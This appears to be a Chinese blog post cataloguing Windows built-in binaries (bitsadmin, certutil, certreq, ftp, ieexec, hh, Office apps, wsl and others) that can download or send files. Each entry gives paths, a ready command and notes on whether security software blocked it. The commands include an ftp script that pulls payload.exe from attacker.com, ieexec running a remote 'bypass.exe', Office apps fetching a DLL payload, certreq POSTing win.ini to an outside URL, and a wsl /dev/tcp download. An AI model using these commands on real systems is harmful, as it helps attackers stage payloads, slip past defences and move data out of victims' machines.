Windows自带下载

0x01 Bitsadmin.exe 拦截

Used for managing background intelligent transfer
OS:Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10

路径:
C:\Windows\System32\bitsadmin.exe
C:\Windows\SysWOW64\bitsadmin.exe

创建一个名为1的bitsadmin作业,将cmd.exe添加到作业中,配置该作业以运行目标命令,然后继续并完成该作业

bitsadmin /create 1
bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe 
bitsadmin /RESUME 1 
bitsadmin /complete 1

用于将cmd.exe复制到另一个文件夹的命令

bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset

0x02 CertReq.exe 未拦截

Used for requesting and managing certificates
OS:Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10

路径:
C:\Windows\System32\certreq.exe
C:\Windows\SysWOW64\certreq.exe

HTTPS://example.org/发出HTTP POST请求时提供的文件,并将其保存到output.txt

CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt

0x03 Certutil.exe Windows 未拦截

Windows binary used for handeling certificates
OS:Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10

路径:
C:\Windows\System32\certutil.exe
C:\Windows\SysWOW64\certutil.exe

将7zip下载并保存到当前文件夹的磁盘中

certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

0x04 Desktopimgdownldr.exe Windows

Windows binary used to configure lockscreen/desktop image
OS:Windows 10

路径:
c:\windows\system32\desktopimgdownldr.exe

下载文件并将其设置为计算机的锁屏

set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr

0x05 Diantz.exe 未测试成功

Binary that package existing files into a cabinet (.cab) file
OS:Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1.

路径:
c:\windows\system32\diantz.exe
c:\windows\syswow64\diantz.exe

下载并压缩一个远程文件,并将其存储在本地计算机上的cab文件中

diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab

0x06 Esentutl.exe 未测试成功

Binary for working with Microsoft Joint Engine Technology (JET) database
OS:Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10

路径:
C:\Windows\System32\esentutl.exe
C:\Windows\SysWOW64\esentutl.exe

将源EXE复制到目标EXE文件

esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o

0x07 Expand.exe 未测试成功

Binary that expands one or more compressed files
OS:Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10

路径:
C:\Windows\System32\Expand.exe
C:\Windows\SysWOW64\Expand.exe

将源文件复制到目标

expand \\webdav\folder\file.bat c:\ADS\file.bat

0x08 Extrac32.exe 未测试成功

路径:
C:\Windows\System32\extrac32.exe
C:\Windows\SysWOW64\extrac32.exe

将源文件复制到目标文件并覆盖它

extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt

0x09 Ftp.exe

A binary designed for connecting to FTP servers
OS:Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10

路径:
C:\Windows\System32\ftp.exe
C:\Windows\SysWOW64\ftp.exe

下载 使用ftp.exe产生新进程。Ftp.exe下载二进制文件

cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"

0x10 GfxDownloadWrapper.exe 未测试成功

Remote file download used by the Intel Graphics Control Panel, receives as first parameter a URL and a destination file path.
OS:Windows 10

路径:
c:\windows\system32\driverstore\filerepository\64kb6472.inf_amd64_3daef03bbe98572b\
c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_0e9c57ae3396e055\
c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_209bd95d56b1ac2d\
c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_3fa2a843f8b7f16d\
c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_85c860f05274baa0\
c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_f7412e3e3404de80\
c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_feb9f1cf05b0de58\
c:\windows\system32\driverstore\filerepository\cui_component.inf_amd64_0219cc1c7085a93f\
c:\windows\system32\driverstore\filerepository\cui_component.inf_amd64_df4f60b1cae9b14a\
c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_16eb18b0e2526e57\
c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_1c77f1231c19bc72\
c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_31c60cc38cfcca28\
c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_82f69cea8b2d928f\
c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_b4d94f3e41ceb839\
c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_0606619cc97463de\
c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_0e95edab338ad669\
c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_22aac1442d387216\
c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_2461d914696db722\
c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_29d727269a34edf5\
c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_2caf76dbce56546d\
c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_353320edb98da643\
c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_4ea0ed0af1507894\
c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_56a48f4f1c2da7a7\
c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_64f23fdadb76a511\
c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_668dd0c6d3f9fa0e\
c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6be8e5b7f731a6e5\
c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6dad7e4e9a8fa889\
c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6df442103a1937a4\
c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_767e7683f9ad126c\
c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_8644298f665a12c4\
c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_868acf86149aef5d\
c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_92cf9d9d84f1d3db\
c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_93239c65f222d453\
c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_9de8154b682af864\
c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_a7428663aca90897\
c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_ad7cb5e55a410add\
c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_afbf41cf8ab202d7\
c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_d193c96475eaa96e\
c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_db953c52208ada71\
c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_e7523682cc7528cc\
c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_e9f341319ca84274\
c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_f3a64c75ee4defb7\
c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_f51939e52b944f4b\
c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_4938423c9b9639d7\
c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_c8e108d4a62c59d5\
c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_deecec7d232ced2b\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_01ee1299f4982efe\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_02edfc87000937e4\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0541b698fc6e40b0\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0707757077710fff\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0b3e3ed3ace9602a\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0cff362f9dff4228\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_16ed7d82b93e4f68\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1a33d2f73651d989\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1aca2a92a37fce23\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1af2dd3e4df5fd61\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1d571527c7083952\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_23f7302c2b9ee813\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_24de78387e6208e4\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_250db833a1cd577e\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_25e7c5a58c052bc5\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_28d80681d3523b1c\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_2dda3b1147a3a572\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_31ba00ea6900d67d\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_329877a66f240808\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_42af9f4718aa1395\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_4645af5c659ae51a\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_48c2e68e54c92258\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_48e7e903a369eae2\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_491d20003583dabe\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_4b34c18659561116\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_51ce968bf19942c2\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_555cfc07a674ecdd\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_561bd21d54545ed3\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_579a75f602cc2dce\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_57f66a4f0a97f1a3\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_587befb80671fb38\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_62f096fe77e085c0\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6ae0ddbb4a38e23c\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6bb02522ea3fdb0d\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6d34ac0763025a06\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_712b6a0adbaabc0a\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_78b09d9681a2400f\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_842874489af34daa\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_88084eb1fe7cebc3\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_89033455cb08186f\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_8a9535cd18c90bc3\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_8c1fc948b5a01c52\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_9088b61921a6ff9f\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_90f68cd0dc48b625\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_95cb371d046d4b4c\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_a58de0cf5f3e9dca\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_abe9d37302f8b1ae\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_acb3edda7b82982f\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_aebc5a8535dd3184\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_b5d4c82c67b39358\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_b846bbf1e81ea3cf\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_babb2e8b8072ff3b\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_bc75cebf5edbbc50\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_be91293cf20d4372\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c11f4d5f0bc4c592\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c4e5173126d31cf0\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c4f600ffe34acc7b\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c8634ed19e331cda\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c9081e50bcffa972\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_ceddadac8a2b489e\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d4406f0ad6ec2581\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d5877a2e0e6374b6\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d8ca5f86add535ef\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_e8abe176c7b553b5\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_eabb3ac2c517211f\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_f8d8be8fea71e1a0\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_fe5e116bb07c0629\
c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_fe73d2ebaa05fb95\
c:\windows\system32\driverstore\filerepository\igdlh64_kbl_kit127397.inf_amd64_e1da8ee9e92ccadb\
c:\windows\system32\driverstore\filerepository\k127153.inf_amd64_364f43f2a27f7bd7\
c:\windows\system32\driverstore\filerepository\k127153.inf_amd64_3f3936d8dec668b8\
c:\windows\system32\driverstore\filerepository\k127793.inf_amd64_3ab7883eddccbf0f\
c:\windows\system32\driverstore\filerepository\ki129523.inf_amd64_32947eecf8f3e231\
c:\windows\system32\driverstore\filerepository\ki126950.inf_amd64_fa7f56314967630d\
c:\windows\system32\driverstore\filerepository\ki126951.inf_amd64_94804e3918169543\
c:\windows\system32\driverstore\filerepository\ki126973.inf_amd64_06dde156632145e3\
c:\windows\system32\driverstore\filerepository\ki126974.inf_amd64_9168fc04b8275db9\
c:\windows\system32\driverstore\filerepository\ki127005.inf_amd64_753576c4406c1193\
c:\windows\system32\driverstore\filerepository\ki127018.inf_amd64_0f67ff47e9e30716\
c:\windows\system32\driverstore\filerepository\ki127021.inf_amd64_0d68af55c12c7c17\
c:\windows\system32\driverstore\filerepository\ki127171.inf_amd64_368f8c7337214025\
c:\windows\system32\driverstore\filerepository\ki127176.inf_amd64_86c658cabfb17c9c\
c:\windows\system32\driverstore\filerepository\ki127390.inf_amd64_e1ccb879ece8f084\
c:\windows\system32\driverstore\filerepository\ki127678.inf_amd64_8427d3a09f47dfc1\
c:\windows\system32\driverstore\filerepository\ki127727.inf_amd64_cf8e31692f82192e\
c:\windows\system32\driverstore\filerepository\ki127807.inf_amd64_fc915899816dbc5d\
c:\windows\system32\driverstore\filerepository\ki127850.inf_amd64_6ad8d99023b59fd5\
c:\windows\system32\driverstore\filerepository\ki128602.inf_amd64_6ff790822fd674ab\
c:\windows\system32\driverstore\filerepository\ki128916.inf_amd64_3509e1eb83b83cfb\
c:\windows\system32\driverstore\filerepository\ki129407.inf_amd64_f26f36ac54ce3076\
c:\windows\system32\driverstore\filerepository\ki129633.inf_amd64_d9b8af875f664a8c\
c:\windows\system32\driverstore\filerepository\ki129866.inf_amd64_e7cdca9882c16f55\
c:\windows\system32\driverstore\filerepository\ki130274.inf_amd64_bafd2440fa1ffdd6\
c:\windows\system32\driverstore\filerepository\ki130350.inf_amd64_696b7c6764071b63\
c:\windows\system32\driverstore\filerepository\ki130409.inf_amd64_0d8d61270dfb4560\
c:\windows\system32\driverstore\filerepository\ki130471.inf_amd64_26ad6921447aa568\
c:\windows\system32\driverstore\filerepository\ki130624.inf_amd64_d85487143eec5e1a\
c:\windows\system32\driverstore\filerepository\ki130825.inf_amd64_ee3ba427c553f15f\
c:\windows\system32\driverstore\filerepository\ki130871.inf_amd64_382f7c369d4bf777\
c:\windows\system32\driverstore\filerepository\ki131064.inf_amd64_5d13f27a9a9843fa\
c:\windows\system32\driverstore\filerepository\ki131176.inf_amd64_fb4fe914575fdd15\
c:\windows\system32\driverstore\filerepository\ki131191.inf_amd64_d668106cb6f2eae0\
c:\windows\system32\driverstore\filerepository\ki131622.inf_amd64_0058d71ace34db73\
c:\windows\system32\driverstore\filerepository\ki132032.inf_amd64_f29660d80998e019\
c:\windows\system32\driverstore\filerepository\ki132337.inf_amd64_223d6831ffa64ab1\
c:\windows\system32\driverstore\filerepository\ki132535.inf_amd64_7875dff189ab2fa2\
c:\windows\system32\driverstore\filerepository\ki132544.inf_amd64_b8c1f31373153db4\
c:\windows\system32\driverstore\filerepository\ki132574.inf_amd64_54c9b905b975ee55\
c:\windows\system32\driverstore\filerepository\ki132869.inf_amd64_052eb72d070df60f\
c:\windows\system32\driverstore\filerepository\kit126731.inf_amd64_1905c9d5f38631d9\

GfxDownloadWrapper.exe下载返回URL的内容,并将其写入文件DESTINATION FILE PATH,该二进制文件由“ Microsoft Windows硬件”,“兼容性发布者”,“ Microsoft Windows第三方组件CA 2012”,“ Microsoft时间戳PCA 2010”,“ Microsoft时间戳服务”签名。

C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"

0x11 Hh.exe 未拦截

Binary used for processing chm files in Windows
OS:Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10

路径:
C:\Windows\System32\hh.exe
C:\Windows\SysWOW64\hh.exe

使用HTML帮助打开目标PowerShell脚本

HH.exe http://some.url/script.ps1

使用HTML帮助执行calc.exe。

HH.exe c:\windows\system32\calc.exe

0x12 Ieexec.exe 未测试成功

The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL.
OS:Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10

路径:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe

从远程服务器下载并执行bypass.exe

ieexec.exe http://x.x.x.x:8080/bypass.exe

0x13 Makecab.exe 未测试

Binary to package existing files into a cabinet (.cab) file
OS:Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10

路径:
C:\Windows\System32\makecab.exe
C:\Windows\SysWOW64\makecab.exe

下载并压缩目标文件并将其存储在目标文件中

makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab

0x14 Excel.exe 未测试成功,没有签名

Microsoft Office binary
OS:Windows

路径:
C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Excel.exe
C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Excel.exe
C:\Program Files (x86)\Microsoft Office\Office16\Excel.exe
C:\Program Files\Microsoft Office\Office16\Excel.exe
C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Excel.exe
C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Excel.exe
C:\Program Files (x86)\Microsoft Office\Office15\Excel.exe
C:\Program Files\Microsoft Office\Office15\Excel.exe
C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Excel.exe
C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Excel.exe
C:\Program Files (x86)\Microsoft Office\Office14\Excel.exe
C:\Program Files\Microsoft Office\Office14\Excel.exe
C:\Program Files (x86)\Microsoft Office\Office12\Excel.exe
C:\Program Files\Microsoft Office\Office12\Excel.exe
C:\Program Files\Microsoft Office\Office12\Excel.exe

从远程服务器下载有效负载,并将其放置在缓存文件夹中

Excel.exe http://192.168.1.10/TeamsAddinLoader.dll

0x15 Powerpnt.exe 未测试成功

Microsoft Office binary.
OS:Windows

路径:
C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Powerpnt.exe
C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Powerpnt.exe
C:\Program Files (x86)\Microsoft Office\Office16\Powerpnt.exe
C:\Program Files\Microsoft Office\Office16\Powerpnt.exe
C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Powerpnt.exe
C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Powerpnt.exe
C:\Program Files (x86)\Microsoft Office\Office15\Powerpnt.exe
C:\Program Files\Microsoft Office\Office15\Powerpnt.exe
C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Powerpnt.exe
C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Powerpnt.exe
C:\Program Files (x86)\Microsoft Office\Office14\Powerpnt.exe
C:\Program Files\Microsoft Office\Office14\Powerpnt.exe
C:\Program Files (x86)\Microsoft Office\Office12\Powerpnt.exe
C:\Program Files\Microsoft Office\Office12\Powerpnt.exe
C:\Program Files\Microsoft Office\Office12\Powerpnt.exe

下载一个远程有效负载并将其放置在缓存文件夹中

Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll"

0x16 Squirrel.exe

Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.
OS:Windows 7 and up with Microsoft Teams installed

路径:
%localappdata%\Microsoft\Teams\current\Squirrel.exe

上面的二进制文件将转到url并查找RELEASES文件并下载nuget软件包

squirrel.exe --download [url to package]

0x17 Update.exe

Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.

路径:
%localappdata%\Microsoft\Teams\update.exe

上面的二进制文件将转到url并查找RELEASES文件并下载nuget软件包

Update.exe --download [url to package]

0x18 Winword.exe 被拦截

Microsoft Office binary.
OS:Windows

C:\Program Files (x86)\Microsoft Office\root\Office16\winword.exe
C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\winword.exe
C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\winword.exe
C:\Program Files (x86)\Microsoft Office\Office16\winword.exe
C:\Program Files\Microsoft Office\Office16\winword.exe
C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\winword.exe
C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\winword.exe
C:\Program Files (x86)\Microsoft Office\Office15\winword.exe
C:\Program Files\Microsoft Office\Office15\winword.exe
C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\winword.exe
C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\winword.exe
C:\Program Files (x86)\Microsoft Office\Office14\winword.exe
C:\Program Files\Microsoft Office\Office14\winword.exe
C:\Program Files (x86)\Microsoft Office\Office12\winword.exe
C:\Program Files\Microsoft Office\Office12\winword.exe
C:\Program Files\Microsoft Office\Office12\winword.exe

从远程服务器下载有效负载

winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"

0x19 Wsl.exe

适用于Linux可执行文件的Windows子系统(win10开启子系统)
OS:Windows 10, Windows 19 Server

C:\Windows\System32\wsl.exe

从wsl.exe执行calc.exe

wsl.exe -e /mnt/c/Windows/System32/calc.exe

从192.168.1.10下载文件

wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 人面猴
    序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 220,699评论 6 513
  • 死咒
    序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 94,124评论 3 395
  • 救了他两次的神仙让他今天三更去死
    文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 167,127评论 0 358
  • 道士缉凶录:失踪的卖姜人
    文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 59,342评论 1 294
  • 港岛之恋(遗憾婚礼)
    正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 68,356评论 6 397
  • 恶毒庶女顶嫁案:这布局不是一般人想出来的
    文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 52,057评论 1 308
  • 城市分裂传说
    那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 40,654评论 3 420
  • 双鸳鸯连环套:你想象不到人心有多黑
    文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 39,572评论 0 276
  • 万荣杀人案实录
    序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 46,095评论 1 318
  • 护林员之死
    正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 38,205评论 3 339
  • 白月光启示录
    正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 40,343评论 1 352
  • 活死人
    序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 36,015评论 5 347
  • 日本核电站爆炸内幕
    正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 41,704评论 3 332
  • 男人毒药:我在死后第九天来索命
    文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 32,196评论 0 23
  • 一桩弑父案,背后竟有这般阴谋
    文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 33,320评论 1 271
  • 情欲美人皮
    我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 48,690评论 3 375
  • 代替公主和亲
    正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 45,348评论 2 358

推荐阅读更多精彩内容